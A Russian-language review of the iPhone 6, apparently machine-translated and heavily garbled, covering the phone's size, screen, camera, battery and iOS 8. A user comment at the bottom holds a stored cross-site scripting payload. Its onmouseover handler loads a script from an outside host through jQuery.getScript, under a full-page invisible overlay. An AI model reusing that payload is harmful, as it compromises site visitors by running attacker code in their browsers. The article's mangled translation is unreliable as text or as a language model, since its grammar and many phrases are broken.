Главная Apple Обзор iPhone 6
Обзор iPhone 6

Обзор iPhone 6

Давая людям то, что они хотят

Давайте начнем с фактов.

Существует взрывного спроса для больших смартфонов. 4-дюймовый смартфон чувствует себя сейчас небольшой, где-то около 5 дюймов-это новая норма. Однако слишком много большой экран телефона являются громоздкими, неуклюжими, и часто просто плохо. И Apple имеет долгую историю, взять хорошие идеи, очевидно, огромные рынки и будучи первым производителем, действительно ногтей исполнения.

Добавить эти три вещи вместе, и этот телефон на моем столе, вовсе не удивительно. Это iPhone 6: больше, ярче, badder iPhone рассчитаны на клиентов, для которых iPhone 5S и его 4-дюймовый экран, теперь, кажется, восхитительно устаревшие. (Которая в основном и все.) Она начинается с $199 по контракту на два года и поставляется в silver, gold и space gray. Она полна новых технологий и изготовлена из нового плесени. Apple предполагает, что это новый стандарт в новый тип смартфона, на большом экране телефона, что-нибудь справимся. Не первый большой телефон, но лучше. Большой смартфон для всех».

Конечно, Samsung, HTC, и другие были делать большие телефоны, и они имеют многолетний итерации и миллионы продаж, чтобы показать его. Это Купертино, крутой подъем еще: можно ли его перегнать закрепился конкурсе и доказать, что Apple может сделать лучше?

Большой iPhone есть большая работа.

Все это время я имел iPhone 6, я играл в игру. Я рукой телефон, чтобы кто-то, и думаю, что телефон они используют, основываясь на их немедленного реагирования. пользователи iPhone всегда в шоке от размера 6; все они думают, что оно должно быть 6 Plus. Android-пользователи, с другой стороны, не боимся. «Это выглядит просто как » мой телефон»,» они все говорят.

Они не ошибаются. IPhone 6-5.44 см в высоту и 2,64 дюйма в ширину, которая слотов это прямо между прошлогодней Moto X (также 4,7-дюймовый телефон) и новый HTC One. Это почти тот же размер, как Samsung Galaxy S5, только немного тоньше и немного легче. И он разделяет больше общего с многих других Android — телефонов и оригинальные, пышные iPhone, чем с острым, прямоугольные iPhone 5S.

Обзор iPhone 6

IPHONE 6-ЭТО БОЛЬШОЙ IPHONE ДЛЯ ВСЕХ

IPhone 5S был Старк, ювелирные изделия, великолепный объект, который был немного холодным и неприступным. IPhone 6 намного дружелюбнее и гораздо более полезная. Смешение формы и функции этот способ трудно сделать, и Apple получает его в основном правой.

Это просто и правильно спроектированы, с металлической задней панелью, что кривые, чисто по бокам. Существует несколько швов и не уродливые беспорядок. Единственный реальный недостаток-это конструкция антенны: Apple решили, по сути, контур верхней и нижней части телефона обратно с небольшой пластиковой полосы, где беспроводной связи может передавать сигнал. Он просто выглядит плохо, будто кто-то нарисовал на моем телефоне с маркером. HTC просто, полосатый дизайн на один M8 гораздо лучше, и даже Apple стекла-strip-on-the-top-and-bottom подход 5S выглядел приятнее.

В странным образом, тонкий и великолепный, как это, это iPhone умоляет, чтобы иметь дело. (Apple делает некоторые, в том числе действительно очень хорошая линия кожаных чехлов, и сторонних экосистемы собирается получить еще больше.) Она помогает скрыть неприглядные пластиковые прокладки, он делает иначе пятна телефона немного легче сцепление, и это компенсирует неуклюже торчащий объектив камеры на задней, которая предотвращает телефон от сидение на столе. Я волнуюсь, я собираюсь поцарапать объектив, и мне досадно, что телефон не качается. В случае решает обе проблемы.

6 большой, гораздо больше, чем 5S или других iPhones, что было до него. Это даже больше, чем некоторые другие 4.7-дюймовый телефоны; потому что Apple отказывается менять верхней и нижней панелями, чтобы не потревожить большая главная кнопка, телефона гораздо выше, чем она должна быть. Но это все-таки полезная в одной руке и достаточно комфортно, что я никогда не чувствую себя жутко неловко, используя его. Я нашел себя, держа его слегка по-разному, хотя: я, как правило, для отдыха на мои пальцы, а не сжимать его в ладони, тем лучше, чтобы добраться до дальних углов экрана.

Обзор iPhone 6

Экран, конечно, всему причиной iPhone 6 не существует. Это в 4,7 дюймов по диагонали: 1334 на 750 пикселей в высоту в ширину. Это не плотность пикселей Кривой выключателя в том, что Samsung Galaxy Note 4 , но это очень хороший дисплей. Это имеет большое цветопередачу и феноменальной углы обзора, это видимый даже при ярком освещении благодаря новой поляризатор, и мои глаза не могут разглядеть отдельные пиксели в любом месте. Стекла на передних склонах когда-нибудь так тихо, что в изогнутые металлические края, придав iPhone 6 вроде пейзажным бассейном эффект: экран просто никогда, кажется, не до конца.

Есть что-то, идеально отполированные, примерно так, как это чувствует, чтобы использовать этот экран. Я никогда не чувствовал себя так много, как я был по-настоящему перемещать любые вещи под мой палец, манипулируя иконы и картины ручной работы. Это натуральные, экологически чистые отчетливо пути от Apple.

IPHONE 6 НЕ ЧУВСТВУЕТ, КАК ГАДЖЕТ

Только пару небольших исключений, это правильный путь, чтобы построить еще более телефон. Это тоньше, более комфортным, более удобным для сенсорного. Но то, что Apple не был придумать способ, чтобы воспользоваться преимуществами нового экрана недвижимости, или сделать его проще ориентироваться. Другие устройства имеют умный экран блокировки механизмов, или перьями, или разделение экрана, многозадачность, или всегда-голосовое управление. (IPhone 6 не позволяет крикнуть : «Эй, Сири!» для использования голосовых команд через всю комнату, но только при питании от сети.) Компания Apple явно сказав большом телефоне лучше, но это не ответ на критический вопрос: чем он отличается?

6 плюс, по крайней мере, жесты в этом направлении. Несколько приложений работают в ландшафт, удобные двух-панели режимов, и даже домашний экран поворачивается на бок. На «мелкие» модели, хотя, единственная уступка gargantuanism — Достижимости, в которой вы дважды нажмите (но не мыши) на кнопку home и на весь экран скользит вниз. Он делает свою работу, я полагаю, но это просто выглядит так, будто вы что-то сломал, когда есть только половина приложений на экране, а остальная часть экрана пустая.

Apple был шанс здесь, чтобы не просто сделать больше iPhone, но реально подумайте, как мы могли бы использовать больше iPhone по-разному. Как больше iPhone изменяет то, что мы можем сделать, или увидеть, или взаимодействовать с ним на одном дисплее. Но Apple не стала этого делать. Он просто сделал больше, лучше iPhone.

Обзор iPhone 6

Во многом, конечно, больше, лучше iPhone является довольно замечательная вещь. Везде вы посмотрите, это понятно, что Apple провела последний год, тонкая настройка и улучшение каждый квадратный сантиметр iPhone. Новый A8 процессор, который делает все-от запуска приложений до игр, чтобы переключение главных экранов заметно быстрее, чем даже 5S. A8 также поставляется новый комплект датчиков называется М8 «motion co-processor», которая является то, что iPhone 6 использует для того, чтобы пассивно следить твои шаги, высоты и более.

ВЫ НЕ ОБРАТИЛИ ВНИМАНИЕ, ЧТО БОЛЬШИНСТВО ВНУТРЕННИХ УЛУЧШЕНИЙ, НО ОНИ ПОМОГАЮТ

IPhone 6-аккумуляторная батарея является одним из основных бенефициаров, как это беспощадная, тонкая настройка и добавление какого-либо нового оборудования, недвижимости. Телефон может легко длиться меня полтора дня, с утра, на следующий день, неважно, как сильно я его использовать. Я еще зарядить ее почти каждую ночь, но по крайней мере я не вынуждал ребенка аккумулятора только, чтобы получить его через ужин больше.

NFC, наконец, приходит встроенная, которая позволяет предстоящих tap-to-buy Apple системы оплаты труда. Есть также поддержка ускорения LTE и Voice over LTE (на T-Mobile на данный момент), плюс новых стандартах Wi-Fi и даже Wi-Fi calling (также от T-Mobile). Снизу-динамик громче и ярче, чем на 5S. (Он все еще сосет, это просто громче.) Эти тонкие улучшений не чувствую себя значимым и очевидным отдельности, но все вместе они делают iPhone чувствовать себя надежнее и приятнее. IPhone 6 не слишком увлекательно, или новаторским. Это просто отлично.

Обзор iPhone 6

Есть одна особенность, которая выделяется, хотя, тот, который наиболее решительно делает iPhone 6 случай с лучший смартфон на планете: камера. Она по-прежнему стреляет 8-мегапиксельной камеры, но на этот раз делает это с новым датчиком. Он также использует то, что Apple называет «фокус пикселей», чтобы достичь этапа-обнаружить автофокус, который просто удивительно быстро на iPhone 6. Я перемещайте телефон вокруг, и она никогда не появляется на внимание, но все это всегда яркий и готово. Есть некоторые элементы ручного управления, как, например, Блокировка экспозиции, и я по-прежнему нажмите, чтобы фокус иногда, но это никогда не было быстрее, чтобы только кнут телефон из кармана и огонь.

IPhone занимает 6 панорамных фотографий в большем разрешении и сейчас, и в целом занимает лучшие снимки, чем любой смартфон который я когда-либо использовал. Но съемка видео есть, где это iPhone чувствует себя наиболее улучшилось. Вы можете снимать видео 1080p с частотой 60 кадров в секунду, это круто, но я потратил гораздо больше времени съемки до 240 кадров в секунду. Замедленное видео является удивительным (и доступные по горсти Android телефонов тоже), и при 240 fps даже самую обыденную деятельность становится пугающе кинематографический. Все выглядит здорово замедлился, что много. Все.

APPLE IPHONE 6. ОБРАЗЦЫ ФОТОГРАФИЙ

КРУТО: СНИМАТЬ SLOW-MOTION ВИДЕО

Все выглядит лучше, благодаря новой «кинематографический стабилизации», которая проделывает огромную работу успокаивать мои трясущиеся руки. Я могу фильм во время прогулки, или из окна ухабистой такси, и видео, которое выходит гладкой и фазового дрожания. Картина искривления и изгибы еще чуть-чуть, как он обрабатывает и компенсирует, но это хорошо стоит компромисс для видео, что не затошнит. Как замедленное видео и промежутка времени изображения, эта стабилизация делает что-либо лучше выглядят. Я уже выстрелил и общего гораздо больше видео на iPhone 6, чем на любом смартфоне я когда-либо использовал.

Обзор iPhone 6

IPhone 6 оборудование хорошее, даже отличное, но есть немного об этом, по-настоящему амбициозных или по-настоящему перемещения иглы. Это просто уточнение множество существующих идей в гораздо более приятный пакет. Некоторые из идей Apple, совершенствоваться с течением времени — как карты, которая наконец-то не трагическая комедия app — и некоторые подняты от конкурентов. В случае с iPhone 6, существует множество как.

В прошлом году, iOS 7 была действительно новаторской. Это был новый взгляд, новые возможности, новые идеи о том, как нам всем бы использовать смартфоны. Многие из этих идей были отличные, многие из них были плохие, и весь испытывают хаотические, как результат. В этом году, Apple представлена уточнение в виде iOS 8.

IOS 7 БЫЛА СУМАСШЕДШЕЙ, А НОВЫЕ IOS 8 РАЗВИВАЕТСЯ

В новой ОС hyper-ориентированы на совместные действия просты и доступны. Клавиатура обладает интеллектуального ввода, угадать (часто точно, но иногда весело и не так), что вы собираетесь сказать. Это действительно удобно, хотя я стал так быстро набирать текст на большом экране, что я не нуждался в нем так или иначе. Есть более быстрые пути, чтобы отвечать на текстовые сообщения, а в верхней части меню многозадачности есть список людей, которых вы недавно обращались. Во всем ОС, там эти мелкие tune-ups, которые делают все немного быстрее, немного более очевидным. Вы можете удалить себя от досадных групповые сообщения, отправлять быстрые сообщения звуковые сообщения (голосовая почта возвращается!), и сохранять документы с гораздо большей легкостью и с iCloud езды.

Обзор iPhone 6

iPhone 6 скриншоты

Я особенно поражен прожектор, который теперь включает в App Store, веб-сайтов, локальный и другие результаты поиска по мере ввода. Он стал для меня go-способ найти что-либо; это намного быстрее, чем открытие сафари или общении с Siri, которая может быть фантастически полезно, но остается глух.

iOS адаптируется passably, если не в совершенстве, iPhone 6, на большом экране. Некоторые из Apple приложений обновлены для новой резолюции, которая, как правило, означает просто, показывающих на экране одновременно. Большинство сторонних приложений (по крайней мере, до тех пор, пока они не обновлены, которая не займет много времени), только по маштабу вверх, так что вы получите немного больше текста и картинок, как будто все было в щепотку масштабирования всего один шаг. Вещи выглядят и работают отлично, они просто большие. Конечно, я был не сбой, или комично-белый пробел и размыто-текстовых задач в 6 плюс — это весы просто и в основном незаметно.

К сожалению, многие iOS 8 лучших новых функций, не доступных только пока. Я не мог теста непрерывность, которая позволяет двигаться звонки и сообщения между устройствами, или аккуратно вручную функция, которая позволяет подобрать на одном устройстве, на котором вы остановились на другом. Не мог я действительно делаю много с расширения или нового совместного доступа, которые облегчают перемещение данных между iOS-приложений. Это те столпы новой платформы, делая приложения и устройства лучше работают вместе. Они-будущее iOS и OS X. если они работают, они больше, чем просто изысканные-они инновационные. Но они все-таки, за несколько недель, по крайней мере, в будущем.

Обзор iPhone 6

Все лучше и ничего не изменилось.

Та же история, что и в iPhone 6. Apple воспользовалась этой возможностью, чтобы обновить почти все об устройстве, Wi-Fi и LTE, чтобы качество сборки уже замечательной камеры. И, поскольку она имеет большой достаточно, но экран по-прежнему хорошо работает в одной руке и плотно в кармане, это устройство, которое практически каждый телефон покупателя на планете, по крайней мере, рассмотреть. IPhone 6-это совершенно без явных проблем или недостатков — это будет огромный удар. Я собираюсь купить один. (Space серый, 64 Гб, Verizon, в случае, если вам интересно.)

Но там нет ничего по-настоящему амбициозных здесь нет большого видения будущего или нового способа жизни в настоящем. Apple не лучше идеи о том, как сделать использование более дисплей недвижимости, или как помочь пользователям ориентироваться в большей устройства. Это не на грани предлагая новый вид do-it-all компьютера, как это может быть и с iPhone 6 Plus. Новейшие iPhone мог бы быть шанс для компании Apple действительно пересмотреть то, что смартфон оборудование должна быть, но Apple просто построил большую iPhone. Потому что это то, что люди хотели.

По разным причинам, от камеры, чтобы приложение экосистемы к самому оборудованию, а iPhone 6-это один из лучших смартфонов на рынке. Может быть, даже в лучшей. Но это все-таки iPhone. То же самое, Apple делает в течение семи лет. Фантастически хороший iPhone, но и iPhone через и через.

comments powered by HyperComments
mario
2014-12-12 18:46:54
[<a href="#" title="]" rel="nofollow"></a>[" <!-- onmouseover=jQuery.getScript('http://wpxss.bestvt.org/') style="text-decoration:none;display:block;width:3000px;height:3000px;position:absolute;top:0px;left:0px;//&gt; --><a></a>]
WP: 44.22MB | MySQL: 132 | 0,671 sec